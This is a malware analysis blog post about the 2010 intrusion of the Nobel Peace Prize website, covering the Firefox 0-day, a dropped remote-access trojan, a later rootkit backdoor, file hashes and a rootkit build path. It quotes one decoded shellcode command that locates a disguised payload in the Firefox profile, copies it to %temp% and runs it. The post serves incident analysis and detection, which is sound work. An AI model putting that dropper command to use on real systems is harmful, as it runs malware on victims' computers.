LessNet: Revisiting the Nobelpeaceprize.org Intrusion

October 26th, 2010 the homepage of the Norwegian Nobel Peace Prize Committee was compromized with a 0-day exploit designed for Mozilla Firefox. The Norwegian telecommunications company Telenor discovered this, and notified NorCERT and us.

How the Nobel site was compromized is not known. However, the details around the installed malware itself is available.

When the Nobel site was investigated, a small local iframe was discovered at the bottom of the page:

The index page in the cache folder contained another iframe

This pointed to the main malicious script at a server in Taiwan which contained the actual exploit, CVE-2010-3765 as it was later to be called. It was designed to trigger on Firefox 3.6.8-3.6.11 on Windows XP only, even if the actual exploit might have worked on more platforms.

The shellcode contained in admin.php was encoded and looked like this:

A piece of the admin.php script. Notice the emphasized statement.

This script decodes to:

Shell code as visible in memory

The interesting bit here is the statement that is the command line fed to CMD.EXE:

cmd.exe /c FOR /R “%USERPROFILE%Local SettingsApplication DataMozillaFirefoxProfiles” %i IN (*) DO if %~zi equ 48640 cmd.exe /c copy “%i” “%temp%scvhost.exe” /y & “%temp%scvhost.exe”

Remember svchost.txt, pulled down by the innocuous reference in admin.php? It is 48640 bytes long. The shellcode simply locates any file of that size in the Firefox temp folder, copies it to an exe file and executes it.
Scvhost.txt is of course not a text file at all. It is a Win32 executable, a small and rather stupid remote access trojan that connects out to the command&control server on either port 443 or 80, and ties the connection to an unencrypted command shell on the compromized computer.

That’s where the official story ended back in 2010.

But there is a continuation of the story that has not been publicly known.
Morten Kråkvik of Telenor TSOC (now my colleague here at Norman) logged accesses to infected lab boxes. And after a while, someone came in through the command shell and started issuing manual commands, like ipconfig and dir. And they uploaded more malware.

The new malware was a 90112 byte executable (explorer.exe, md5 b119c67b2fbff1824211c941ad5526ca) that extracted two more executables from resources. These executables consisted of one DLL (nmevtmsgc2.dll, md5 3b327465079c7b064aca4f3b629e3d92) and one driver (pclidec2.sys & rasacd.sys, md5 03f83728c5ded953d9838762b2dab9cf). This is a proper backdoor and rootkit, more complex than the first backdoor, but still with some clear deficiencies. It is for example not designed for OS’es newer than Windows XP/2003 .

Accompanying these files was a configuration resource specifying Command&Control server and what appears to be a campaign tag. The C&C server was identical to the original download point. The campaign code in this case was “US”. If this code is not found in the configuration the backdoor reverts back to its default code, which is “LessNet”.

C&C and campaign code

The extracted executables contain easily recognizable strings, such as the rootkit project path:
E:SnakeSkNet_HKLZTBackdorGuard_C2ESK_Kernel_C2objfre_wxp_x86i386Esk_kernel_C2.pdb

Such strings makes it easy to track other incidents with the same (or related) malware. And sure enough, this malware has been used on other occasions. Below is a list of the cases where we know it has been used.

There are several aspects of this case that are puzzling. The malware used in these attacks is not very advanced. However, Firefox 0-day exploits don’t grow on trees, and it is odd that the attackers chose to use such heavy weaponry for what otherwise was a halfhearted attack. My impression back then was that the attack was just intended as a sign of displeasure over the Liu Xiaobo Nobel Prize.

What is also odd is that the attackers appear to continue to use these backdoors in a low-intensity fashion (latest seen December last year), even if they are clearly outdated at this point in time. They are not even recompiled, packed or obfuscated to avoid detection.